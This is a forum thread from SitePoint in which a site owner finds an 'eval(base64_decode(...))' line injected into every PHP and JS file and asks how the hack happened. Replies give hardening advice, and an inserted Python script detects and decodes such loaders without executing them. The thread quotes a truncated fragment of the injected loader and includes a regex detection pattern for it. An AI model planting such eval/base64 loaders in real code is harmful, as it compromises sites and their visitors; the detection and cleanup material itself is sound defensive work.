  1. #1
    SitePoint Addict
    Join Date
    Sep 2008
    Posts
    235

    php decode hacked my site

    I found a problem on my site, and when I compared the files on the server with my local files I found that every page (*.js or *.php) has this line in it:
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
    or a JavaScript line.

    So I knew that my site had been hacked.
    So:
    1 - I want to know how to prevent anyone from hacking my site.
    On every text field or textarea, when posting or getting it, I used htmlspecialcharacter($_POST['name'])

    Is this true? And can it help me?

    2 - How did anyone hack my site?

    3 - How can I know what this code means?

    Thanks in advance and have a nice day.

  2. #2
    SitePoint Addict
    Join Date
    May 2006
    Location
    Amsterdam
    Posts
    206
    There are many possibilities and there's a lot of work to do ... Just as a quick check-list, have you

    1. Changed the passwords for accessing your site: ftp, mysql, any other password protected services?
    2. Made sure no folder in your doc_root (public_html or www usually) is set to 777, make sure it's 755?
    3. Stopped processing any forms on your site?

    There are many ways to crack a site. Here are a few off the top of my head:
    • folders with 777 privileges
    • forms that are not properly sanitized

    To look at the base64 encoded code you'd have to echo it in its decoded form. I believe you could put it into a string and echo it. Get rid of the eval() part, that's what is running it as PHP code. Also, this blog may help http://shiflett.org/
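
The checks from the reply above as a stand-alone script, added here as an example and not written by any poster in this thread: it decodes `eval(base64_decode('...'))` payloads for reading without ever executing them, and lists world-writable (777-style) directories. The function names, the `.php`/`.js` filter and the temporary sample tree are assumptions, and the sample payload is constructed.

```python
import base64, os, re, stat, tempfile

# The injected wrapper quoted in the thread: eval(base64_decode('...'))
INJECT_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)")

def decode_injections(data):
    """Return each wrapped payload as text. Nothing is ever executed."""
    found = []
    for match in INJECT_RE.finditer(data):
        blob = re.sub(rb"\s+", b"", match.group(1))
        blob += b"=" * (-len(blob) % 4)  # tolerate stripped padding
        try:
            found.append(base64.b64decode(blob).decode("utf-8", "replace"))
        except ValueError:  # corrupt base64: report it, keep scanning
            found.append("<undecodable>")
    return found

def scan_tree(root):
    """Map infected .php/.js files to decoded payloads; list o+w dirs."""
    infected, writable = {}, []
    for dirpath, _dirs, files in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:  # e.g. mode 777
            writable.append(os.path.relpath(dirpath, root))
        for name in files:
            if name.endswith((".php", ".js")):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    hits = decode_injections(fh.read())
                if hits:
                    infected[os.path.relpath(path, root)] = hits
    return infected, writable

def demo():
    """Scan a constructed docroot (hypothetical file names) in a temp dir."""
    payload = base64.b64encode(b"echo 'constructed sample';").decode()
    with tempfile.TemporaryDirectory() as root:
        images = os.path.join(root, "images")
        os.mkdir(images)
        os.chmod(images, 0o777)  # the risky mode discussed in the thread
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php /**/eval(base64_decode('%s')); ?>\n" % payload)
        with open(os.path.join(root, "clean.php"), "w") as fh:
            fh.write("<?php echo 'ok'; ?>\n")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Call `scan_tree()` on a copy of the document root; any file it reports should be replaced from the known-good local copies.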

  3. #3
    SitePoint Wizard frank1
    Join Date
    Oct 2005
    Posts
    1,392
    Quote: Originally Posted by danNL
    • Made sure no folder in your doc_root (public_html or www usually) is set to 777, make sure it's 755?
    There are many ways to crack a site. Here are a few off the top of my head:
    • folders with 777 privileges

    Can you illustrate what it means?
    I mean, do you mean that people might be able to upload PHP files in there?

    And the image folder (support logo folder) is 777.
    How could it cause a site hack?

  4. #4
    SitePoint Addict
    Join Date
    May 2006
    Location
    Amsterdam
    Posts
    206